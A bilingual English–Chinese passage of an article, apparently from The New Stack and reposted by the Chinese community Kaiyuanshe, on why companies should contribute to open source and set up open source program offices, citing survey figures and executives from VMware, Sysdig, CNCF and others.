Mikhailov说，该组织是由万事达包容性发展中心和洛克菲勒基金会支持，旨在促进使用数据科学来应对当今社会所面临的巨大挑战的非营利性组织。 While nearly all organizations use open source software, only a minority contribute to those projects. Forty-two percent of participants in a survey released in September by The New Stack, Linux Foundation Research, and the TODO Group said tthey contribute at least sometimes to open source projects. 虽然几乎所有组织都在使用着开源软件，但只有少数组织为这些项目作出了贡献。The New Stack、Linux Foundation Research 和 TODO Group 在 9 月发布的一项调查中，42% 的参与者表示，他们至少有时会为开源项目做出贡献。 The same study showed that only 36% of organizations train their engineers to contribute to open source. 而同一项研究表明，只有36%的组织会培训他们的工程师为开源作出贡献。 Individual companies should support projects that they use the most and are critical to their success, Mikhailov said: “If you use, you contribute.” 个体公司应该支持贡献这些他们使用最多且对他们成功至关重要的项目，Mikhailov认为：“如果你使用开源，你就应该为他做出属于你自己的贡献。” Part2OSPO Benefits:Less Tech Debt,Better Recruiting Participating in open source communities — especially when guided by an in-house open source program office (OSPO) — can help ensure the health of projects critical to your organization’s success, improve those projects’ security, and allow your engineers to have more impact in the projects’ development road map. 参与开源社区——特别是在内部开源项目办公室（OSPO）的指导下——不仅可以保证对组织成功至关重要项目的健康发展，还可以提高项目安全性，同时可以允许工程师在项目发展规划中起到更大的影响。 Say, for example, a company uses an open source tool and modifies it a little to make it better. If that improvement isn’t contributed back to the community, then the official version of the open source project will start to diverge from what the company is using 例如，如果一家公司使用了开源工具，并对其进行了一些调整使其变得更好。但如果这项改进没有反馈到开源社区，那么开源项目的正式版本就会一开始与该公司所使用的版本有所不同。 “You start to grow technical debt because when the original source changes and you’ve got a different version. Those differences grow rapidly, compounding daily. It doesn’t take long for you to be the proud user and maintainer of a one-of-a-kind open source project variant,” said Suzanne Ambiel, director, open source marketing and strategy at VMware. “当原始代码来源发生变化且你所使用的是不同的版本时，你的技术负债将越来越多。而这些差异是以天为单位迅速增长的。”VMware 开源营销和战略总监 Suzanne Ambiel 表示，“所以你很快就会变成一个开源项目里独一无二变体的‘自豪’用户和维护人员。” “The technical debt gets bigger and bigger and it gets very expensive for a company to manage.” “如果技术负债越来越多，那么公司的管理成本则会非常昂贵”。 Support for open source activity can also be a recruiting tool. “It’s really a talent magnet,” said Ambiel. “It’s one of the things that new hires look for.” 实际上对于开源活动的支持也变成了一种招聘途径。“这真是一块吸引人才的磁铁，”Ambiel说，“这也是新员工所寻求的“。 Some engineering managers might worry that open source contributions will detract from core product development, she said. Their rationale, she added, might run along the lines of, “I only have so much talent, and so many hours, and I need them to only work on things where I can measure and see the return on investment.” 她还提到，一些工程经理可能会对贡献开源而减损核心产品的开发的精力而感到担忧。她补充到，他们的理由有可能是这样的：“我只有有限的才华与时间，且我需要这些只做我认为可以度量且看到投资回报的事情。” But that attitude, she said, is shortsighted. Supporting employees who contribute to open source communities can build skills and develop talent, she said. 但她说，这是一种鼠目寸光的态度。支持开源社区并且作出贡献的员工，可以从中培养技能与增长才华。 Loris Degionni, chief technology officer and founder at Sysdig, a cloud security vendor, echoed this notion: “Finding employees who contribute to open source is a gold mine,” said. 云安全供应商 Sysdig 的首席技术官兼创始人 Loris Degionni 也赞同这一观点：“找出为开源做出贡献的员工无疑就找到一座金矿，”他说。 These employees are more capable of delivering features a company wants to use and merge them into community-supported standards, he said. And in a war for talent, companies that embrace open source are more attractive to developers. 他认为，这些参与开源的员工更具备公司想拥有的竞争力并将一些功能融入至社区所支持的标准中。且在人才争夺战中，拥抱开源的公司也更受到开发人员的青睐。 “Lastly, open source is driven by a community of technical experts you may not be able to hire,” he said. “When employees actively contribute and collaborate with these experts, they’ll be better informed of best practices and bring them back to your organization. “最后，开源项目是由你可能无法聘请的技术专家社区推动的”，他说，“当员工积极参与并于这些专家合作时，他们将能更好地深入这些最佳实践，并将这些收获带回到你的组织之中。” “You start to grow technical debt because when the original source changes and you’ve got a different version … It doesn’t take long for you to be the proud user and maintainer of a one-of-a-kind open source project variant.” —Suzanne Ambiel, director, open source marketing and strategy, VMware “当原始数据来源发生变化且你所使用的是不同的版本时，你的技术负债将越来越多...所以你很快就会变成一个开源项目里独一无二变体的”自豪“用户和维护人员。” — Suzanne Ambiel，VMware 开源营销和战略总监 “All of this should be rewarded — developers shouldn’t have to spend their free time honing their skills, as your company will quickly see benefits from their efforts.” “但是这一切终究不会白费--开发人员不应该把业余时间用在磨练他们的技能上，因为你的公司很快就会在他们的努力中看到好处。” An OSPO, Degionni suggested, can help achieve these goals, as well as help prioritize contributions and ensure collaboration. In addition, they can help provide governance that mirrors what companies would have for internally developed applications. Degionni认为，OSPO（开源计划办公室）可以帮助公司实现这些目标，以及帮助确定贡献的优先级并确保合作的进行。除此之外，他们也可以对公司内部开发应用程序方面的治理提供相关帮助。 “Members of the open source team are also in a position to be great internal evangelists for open source technologies, and act as bridges between the organization and the broader community,” he added. “开源团队的成员也可以成为开源技术的伟大内部布道师，并充当组织与更广泛社区之间的桥梁。”他补充道。 In the September survey from The New Stack, Linux Foundation Research and the TODO Group, nearly 53% of organizations with OSPOs said they saw more innovation as a result of having an OSPO, while almost 43% said they saw increased participation in external open source projects. 在 The New Stack、Linux Foundation Research 和 TODO Group 的 9 月调查中，近 53% 的拥有 OSPO的组织表示，由于拥有了OSPO，他们看到了更多创新，而近 43% 的组织表示，他们在外部开源项目的参与度上有所增加。 Part3More OSPO Benefits:A Business Edge Contributing to open source communities doesn’t just help the communities, but the companies that contribute to them, said Tom Hickman, chief innovation officer at ThreatX, a cybersecurity firm. 网络安全公司 ThreatX 的首席创新官 Tom Hickman 表示，为开源社区做出贡献，不仅有助于社区，还有助于为社区做出贡献的公司。 “Growing the community of developers around a project helps the code base, and attracts more developers,” he said. “It can become a virtuous circle.” “围绕一个项目而发展的开发人员社区，有助于代码库的形成，并吸引更多的开发人员参与”，他说，“这可以变成一个良性循环。” Also, companies that contribute to open source projects get twice the productive value from their use of open source than companies that don’t, according to research by Harvard Business School. 此外，根据哈佛商学院的研究，为开源项目作出贡献的公司从使用开源的项目中获得的生产价值，是不参与开源项目公司的两倍。 Many of the biggest companies in the world are contributing to open source, said Chris Aniszczyk, chief technology officer at Cloud Native Computing Foundation. He pointed to the Open Source Contributor Index as a reference for exactly just how much companies are doing. Cloud Native Computing Foundation 的首席技术官 Chris Aniszczyk 说，世界上许多巨头公司都为开源作出了贡献。他还提到，开源贡献者的指数是作为公司是否有所作为的参考。 The tech giants dominate the list: Google, Microsoft, Red Hat, Intel, IBM, Amazon, Facebook, VMware, GitHub and SAP are the top 10 contributors, in that order. But there are also a lot of end users on the top 100 list, said Aniszczyk, including Uber, the BBC, Orange, Netflix, and Square. 科技巨头占据了这份榜单的主导地位：谷歌、微软、红帽、英特尔、IBM、亚马逊、Facebook、VMware、GitHub 和 SAP 依次是排名前 10 的贡献者。但Aniszczyk 表示，但也有很多终端用户公司进入前 100 名，包括 Uber、BBC、Orange、Netflix 和 Square。 “We’ve always known working in upstream projects is not just the right thing to do —it’s the best approach to open source software development and the best way to deliver open source benefits to our customers,” he said. “It’s great to see that IT leaders recognize this as well.” “我们一直知道，在上游项目中工作不仅仅是关正确与否----它是开源软件开发的最佳方法，也是向客户提供开源福利的最佳方式“他说，“很高兴看到IT领导者们也认识到了这一点。” To contribute alongside these giants, companies need to have their own open source strategies, and having an open source program office can help. 为了和这些公司一起作出贡献，公司也需要有自己的开源策略，而拥有一个开源项目办公室则可以为其提供帮助。 “OSPOs provide a critical center of competency in a company when it comes to utilizing open source software,” he said. “在使用开源软件方面，OPSO为公司提供了一个至关重要的能力中心”他说。 It’s similar to the way that companies have security operations centers, he said. 这与公司拥有安全运营中心的方式类似，他说。 “Growing the community of developers around a project helps the code base, and attracts more developers. It can become a virtuous circle.” —Tom Hickman, chief innovation officer, ThreatX “围绕一个项目而发展的开发人员社区，有助于代码库的形成，并吸引更多的开发人员参与，这可以变成一个良性循环。” ——Tom Hickman，ThreatX 首席创新官 “If you don’t make the investment in a security team, you generally don’t expect your software to be secure or be able to respond to security incidents in a timely fashion,” he said. “如果你没有对安全团队进行相应投资，你通常是不会期望你的软件是安全的，也无法及时响应安全事件。”他说。 “The same logic applies to OSPOs and is why you see many leading companies out there such as Apple, Meta, Twitter, Goldman Sachs, Bloomberg, and Google all have OSPOs. They are ahead of the curve.” “同样的逻辑也适用于 OSPO，这就是为什么你会看到许多领先的公司，例如 Apple、Meta、Twitter、Goldman Sachs、Bloomberg 和 Google 都拥有 OSPO。他们走在了趋势的前面。” Support for open source activity within your organization can become a differentiator and marketing opportunity for software vendors. 而对组织内的开源活动的支持态度亦可成为软件供应商们的差异化原因与营销的机会。 According to a Red Hat survey released in February, 82% of IT leaders are more likely to select a vendor who contributes to the open source community. 根据Red Hat2月分发布的一项调查，82%的IT领导者更倾向于选择为开源社区作出贡献的软件供应商。 Respondents said that when vendors support open source communities they are more familiar with open source processes and are more effective if customers have technical challenges. 受访者表示，当供应商支持开源社区时，就表示着他们更熟悉开源的流程并且在客户遇到技术难题时会更加有效。 But it’s not just software vendors who benefit. 但收益的不仅仅是软件供应商们。 According to September’s survey by The New Stack, Linux Foundation Research, and the TODO Group, 57% of organizations with OSPOs use them to further strategic relationships and build partnerships. 根据 The New Stack、Linux Foundation Research 和 TODO Group 9 月份的调查，57% 拥有 OSPO 的组织将使用它们来进一步发展战略关系和建立合作伙伴关系。 Mark Hinkle started an open source program office back when he worked at Citrix a decade ago. He pointed out how having an OSPO in-house benefited the company. 十年前，Mark Hinkle 在 Citrix 工作时创办了一个开源计划办公室。他指出了在内部拥有一个 OSPO将如何使公司受益。 “For us the biggest job was to educate our employees who weren’t familiar with open source to get involved and be good community members,” he said. “We also provided guidance on how to make sure our IP didn’t enter projects without proper understanding and we made sure we didn’t incorporate open source that conflicted with our enterprise software licensing.” “对于我们来说，最大的工作是让不熟悉开源的员工学会并参与其中，成为优秀的社区成员”，他说，“我们还就如何确保我们的IP不会在没有正确理解的情况下进入项目的情况提供了指导，并确保我们没有与我们企业软件许可相冲突的开源项目合作。” The OSPO also helped Citrix identify strategic opportunities for the company to participate in open source projects and trade organizations like The Linux Foundation, he said. 他说，OSPO还帮助Citrix确定了公司参与开源项目和Linux基金会等贸易组织的战略机会。 Today, he’s the CEO and co-founder of TriggerMesh, a cloud native, open source integration platform. 如今，他是云原生开源集成平台 TriggerMesh 的首席执行官兼联合创始人。 There are some significant economic benefits to participating in the open source ecosystem, he said. 他说，参与开源系统对公司来说有着重大的经济效益。 “We participate in Knative to share the development of our underlying platform but we develop value-added services as part of our business,” he said. “By sharing the R and D for the platform, it gives us more resources to develop our own differentiated technology.” “我们参与Knative是为了分享我们基础底层平台的开发，但作为业务的一部分，我们也拥有相关的增值服务。”他说，“通过共享该平台的研发，这为我们提供了更多的资源来改进我们自己的差异化技术。” Part4How to Get Started in Open Source Sixty-three percent of companies in the September survey from The New Stack, Linux Foundation Research and the TODO Group said that having an OSPO was very or extremely critical to the success of their engineering or product teams, up from 54% in the previous annual study. 在 The New Stack、Linux Foundation Research 和 TODO Group 的 9 月份调查中，有 63% 的公司表示，拥有OSPO 对其工程或产品团队的成功至关重要，高于上一年度该项研究数据的 54%。 In particular, 77% said that their open source program had a positive impact on their software practices, such as improved code quality. 其中77% 的人表示他们的开源程序对他们的软件实践产生了积极影响，例如提高了代码质量。 But companies can’t always contribute to every single open source project that they use. 但公司也不可能总是为他们使用的每一个开源项目而花费精力。 “First, thin the herd a little bit,” advised VMware’s Ambiel. “首先，节流一下”，VMware 的 Ambiel 建议道。 Companies should look at the projects that make the most sense for their use cases. This is an area where an OSPO can help set priorities and ensure technical and strategic alignment. 公司应该关注投入使用中最有意义的项目。而这也是OSPO可以帮助确定优先事项并确保技术与战略一致性的领域。 Then, developers should go and check out the projects themselves. Projects typically offer online documentation, often with contributor guides, governance documents, and lists of open issues. 之后，开发人员应该自己去了解一下。项目通常提供相关在线文档，一般包含贡献着指南、治理文档和未解决问题列表。 “For the projects that rise to the top of your strategic list, introduce yourself — say hello,” she said. “Go to the Slack channel or the distribution list and ask where they need help. Maybe they don’t need help and everything is good. Or maybe they can use a new person to review code.” “对于那些上升到你的战略清单顶端的项目，你可以介绍一下自己----打个招呼”，她说。“然后转到Slack频道或者分发列表，询问他们需要帮助的地方。也许他们不需要帮助，一切完好；又或者他们也有可能使用新人来审查核验代码。” An open source program office can not only help make a business case for contributing to the open source community, Ambiel said, but can help companies do it in a way that’s safe, secure and sound. Ambiel 说，开源项目办公室不仅可以帮助制定为开源社区做出贡献的商业案例，还可以帮助公司以安全、可靠和健全的方式来做这件事。 “If I work for a company and want to contribute to open source, I don’t want to accidentally disclose, divulge or undermine any patents,” she said. “An OSPO helps you make smart choices.” “如果我为一家公司工作，并想为开源做出贡献，我不想意外披露、泄露或破坏任何专利，”她说。“而OSPO可以帮助您做出明智的选择。” An OSPO can also help provide leadership and the guiding philosophy about supporting open source, she said. “It can provide guidance, mentorship, coaching and best practices.” 她说，OSPO还可以在开源方面提供领导力和指导理念的支持。“它可以提供引领、指导、辅导和最佳实践的作用。” Commitment to support open source has to start at the top, said Anaïs Urlichs, developer advocate at Aqua Security. Aqua Security的开发人员倡导者Anaïs Urlichs则认为，支持开源的承诺必须从高层开始。 “Too often,” she said, “companies do not value investment into open source, so employees are not encouraged to contribute to it.” 她说，“公司在多数时候往往不重视对开源的投资，所以员工自然而然不被鼓励对此作出贡献。” In those cases, employees with a passion for open source end up contributing during their free time, which is not sustainable. 在这些情况下，员工对于开源的热情也会在空闲时间里对开源的建设而消散殆尽，这对于开源的发展来说是不可持续的。 “If companies rely on open source projects, it is important to make open source contributions part of an engineer’s work schedule,” she said. “Some companies define a time percentage that employees can contribute to open source as part of their normal workday.” “如果公司对开源项目依赖度高，那么将开源贡献纳入工程师的日程安排是很重要的，”她说。“一些公司定义了员工可以为开源建设的时间百分比，将其作为他们正常工作日的一部分。” The New Stack is a wholly owned subsidiary of Insight Partners, an investor in the following companies mentioned in this article: Sysdig, Aqua Security. The New Stack 是 Insight Partners 的全资子公司，Insight Partners 是本文提到的以下公司的投资者：Sysdig、Aqua Security。 相关阅读 | Related Reading 《开源合规指南（企业篇）》正式发布，为推动我国开源合规建设提供参考 “目标->用户->指标”——企业开源运营之道｜瞰道@谭中意 开源之夏邀请函——仅限高校学子开启 开源社简介 开源社成立于 2014 年，是由志愿贡献于开源事业的个人成员，依 “贡献、共识、共治” 原则所组成，始终维持厂商中立、公益、非营利的特点，是最早以 “开源治理、国际接轨、社区发展、开源项目” 为使命的开源社区联合体。开源社积极与支持开源的社区、企业以及政府相关单位紧密合作，以 “立足中国、贡献全球” 为愿景，旨在共创健康可持续发展的开源生态，推动中国开源社区成为全球开源体系的积极参与及贡献者。 2017 年，开源社转型为完全由个人成员组成，参照 ASF 等国际顶级开源基金会的治理模式运作。近八年来，链接了数万名开源人，集聚了上千名社区成员及志愿者、海内外数百位讲师，合作了近百家赞助、媒体、社区伙伴。 本篇文章为转载内容。原文链接：https://blog.csdn.net/kaiyuanshe/article/details/124976824。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。